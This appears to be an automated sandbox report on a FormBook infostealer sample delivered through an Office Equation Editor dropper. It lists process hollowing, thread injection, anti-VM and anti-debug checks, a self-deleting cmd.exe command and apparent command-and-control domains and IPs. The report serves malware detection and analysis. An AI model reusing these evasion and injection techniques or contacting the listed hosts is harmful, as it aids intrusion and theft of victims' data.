Source: 6.2.vbc.exe.f70000.2.unpack, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.vbc.exe.f70000.0.unpack, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.vbc.exe.f70000.0.unpack, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.vbc.exe.f70000.5.unpack, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00F7297F push 20000001h; retf 6_2_00F72992
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A024 push es; ret 6_2_0045A025
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418846 push edi; retf 7_2_00418847
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C935 push ds; ret 7_2_0041C93E
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C99B push dword ptr [87B7EB05h]; ret 7_2_0041C9BC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415298 push ebp; retf 7_2_00415299
Source: C:\Users\Public\vbc.exe Code function: 7_2_0040C300 push ds; iretd 7_2_0040C318
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041CB3F pushad ; ret 7_2_0041CB40
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3B5 push eax; ret 7_2_0041B408
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B46C push eax; ret 7_2_0041B472
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B402 push eax; ret 7_2_0041B408
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B40B push eax; ret 7_2_0041B472
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C538 push dword ptr [2E33947Ah]; ret 7_2_0041C791
Source: C:\Users\Public\vbc.exe Code function: 7_2_00414D98 push ebx; retf 7_2_00414DA7
Source: C:\Users\Public\vbc.exe Code function: 7_2_004066FC push ecx; iretd 7_2_00406713
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C793 push dword ptr [2E33947Ah]; ret 7_2_0041C791
Source: C:\Users\Public\vbc.exe Code function: 7_2_00F7297F push 20000001h; retf 7_2_00F72992
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092DFA1 push ecx; ret 7_2_0092DFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009FDFA1 push ecx; ret 9_2_009FDFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00095298 push ebp; retf 9_2_00095299
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0008C300 push ds; iretd 9_2_0008C318
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B3B5 push eax; ret 9_2_0009B408
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B40B push eax; ret 9_2_0009B472
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B402 push eax; ret 9_2_0009B408
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B46C push eax; ret 9_2_0009B472
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009C538 push dword ptr [2E33947Ah]; ret 9_2_0009C791
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000866FC push ecx; iretd 9_2_00086713
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009C793 push dword ptr [2E33947Ah]; ret 9_2_0009C791
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00098846 push edi; retf 9_2_00098847
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009C935 push ds; ret 9_2_0009C93E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009C99B push dword ptr [87B7EB05h]; ret 9_2_0009C9BC
Source: initial sample Static PE information: section name: .text entropy: 7.5240697297

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 940, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2432 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2248 Thread sleep time: -33461s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2732 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2680 Thread sleep time: -36000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088B0 rdtsc 7_2_004088B0
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 33461 Jump to behavior
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.500434774.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000008.00000000.500434774.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000000.485172151.000000000449C000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0v
Source: explorer.exe, 00000008.00000000.485467727.0000000004513000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000Co>
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000008.00000000.487676458.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000008.00000000.500756480.00000000045D4000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088B0 rdtsc 7_2_004088B0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 7_2_009326F8 mov eax, dword ptr fs:[00000030h] 7_2_009326F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A026F8 mov eax, dword ptr fs:[00000030h] 9_2_00A026F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 7_2_00409B20 LdrLoadDll, 7_2_00409B20
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.thvsjwjvy.icu
Source: C:\Windows\explorer.exe Domain query: www.carlsbadbeachwear.com
Source: C:\Windows\explorer.exe Domain query: www.biotechfla.com
Source: C:\Windows\explorer.exe Network Connect: 154.91.1.126 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 47.91.170.222 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.359326.com
Source: C:\Windows\explorer.exe Domain query: www.absolutalibertas.com
Source: C:\Windows\explorer.exe Domain query: www.crownfoamus.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 830000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000008.00000000.487921894.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682273930.0000000003010000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000008.00000000.487921894.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682273930.0000000003010000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000008.00000000.487921894.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682273930.0000000003010000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY